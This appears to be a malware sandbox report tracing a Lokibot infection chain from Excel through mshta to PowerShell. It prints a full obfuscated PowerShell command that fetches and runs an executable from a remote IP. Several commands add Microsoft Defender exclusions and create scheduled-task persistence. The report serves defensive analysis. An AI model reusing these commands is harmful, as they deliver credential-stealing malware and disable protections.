2024-11-21 00:20:31 UTC	468	IN	HTTP/1.1 302 Found Content-Length: 120 Content-Type: text/plain; charset=utf-8 Date: Thu, 21 Nov 2024 00:20:31 GMT Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Connection: close
2024-11-21 00:20:31 UTC	120	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	198.244.140.41	443	3644	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 00:20:35 UTC	410	OUT	GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: provit.uk Connection: Keep-Alive
2024-11-21 00:20:35 UTC	468	IN	HTTP/1.1 302 Found Content-Length: 120 Content-Type: text/plain; charset=utf-8 Date: Thu, 21 Nov 2024 00:20:35 GMT Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Connection: close
2024-11-21 00:20:35 UTC	120	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49166	198.244.140.41	443	3400	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-21 00:21:02 UTC	386	OUT	GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: provit.uk Connection: Keep-Alive
2024-11-21 00:21:02 UTC	468	IN	HTTP/1.1 302 Found Content-Length: 120 Content-Type: text/plain; charset=utf-8 Date: Thu, 21 Nov 2024 00:21:02 GMT Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Connection: close
2024-11-21 00:21:02 UTC	120	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49170	198.244.140.41	443	3768	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 00:21:07 UTC	410	OUT	GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: provit.uk Connection: Keep-Alive
2024-11-21 00:21:07 UTC	468	IN	HTTP/1.1 302 Found Content-Length: 120 Content-Type: text/plain; charset=utf-8 Date: Thu, 21 Nov 2024 00:21:07 GMT Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Connection: close
2024-11-21 00:21:07 UTC	120	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta

Target ID:	0
Start time:	19:20:07
Start date:	20/11/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f5c0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:20:31
Start date:	20/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x13fa70000
File size:	13'824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:20:38
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Imagebase:	0x13f790000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:20:41
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
Imagebase:	0x13f790000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:20:44
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline"
Imagebase:	0x13fac0000
File size:	2'758'280 bytes
MD5 hash:	23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:20:44
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1ED7.tmp" "c:\Users\user\AppData\Local\Temp\fkur3fvp\CSC55312E8BACB34CD3B1B97BFED1B34D9.TMP"
Imagebase:	0x13f060000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:20:51
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\caspol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\caspol.exe"
Imagebase:	0x1080000
File size:	600'576 bytes
MD5 hash:	74061922F1E78C237A66D12A15A18181
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:20:51
Start date:	20/11/2024
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Imagebase:	0x10a0000
File size:	2'525'680 bytes
MD5 hash:	2F8D93826B8CBF9290BC57535C7A6817
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:20:52
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Imagebase:	0x340000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:20:53
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Imagebase:	0x340000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:20:53
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp"
Imagebase:	0x3c0000
File size:	179'712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:20:55
Start date:	20/11/2024
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {6A6C3D45-060E-4891-98BB-3A2AADA7326E} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff6a0000
File size:	464'384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	19:20:55
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\caspol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\caspol.exe"
Imagebase:	0x1080000
File size:	600'576 bytes
MD5 hash:	74061922F1E78C237A66D12A15A18181
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000014.00000002.634660515.0000000000854000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	19:20:56
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
Imagebase:	0xe00000
File size:	600'576 bytes
MD5 hash:	74061922F1E78C237A66D12A15A18181
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:20:59
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Imagebase:	0x1010000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 3588, Parent PID: 2148

General

Target ID:	24
Start time:	19:21:01
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Imagebase:	0x1010000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: schtasks.exePID: 3580, Parent PID: 2148

General

Target ID:	26
Start time:	19:21:01
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpBD09.tmp"
Imagebase:	0x200000
File size:	179'712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:21:02
Start date:	20/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x13fee0000
File size:	13'824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	19:21:06
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Imagebase:	0xe00000
File size:	600'576 bytes
MD5 hash:	74061922F1E78C237A66D12A15A18181
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	19:21:06
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Imagebase:	0xe00000
File size:	600'576 bytes
MD5 hash:	74061922F1E78C237A66D12A15A18181
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	19:21:08
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Imagebase:	0xa40000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 2760, Parent PID: 532

General

Target ID:	34
Start time:	19:21:09
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
Imagebase:	0x13f490000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: csc.exePID: 3300, Parent PID: 532

General

Target ID:	35
Start time:	19:21:11
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
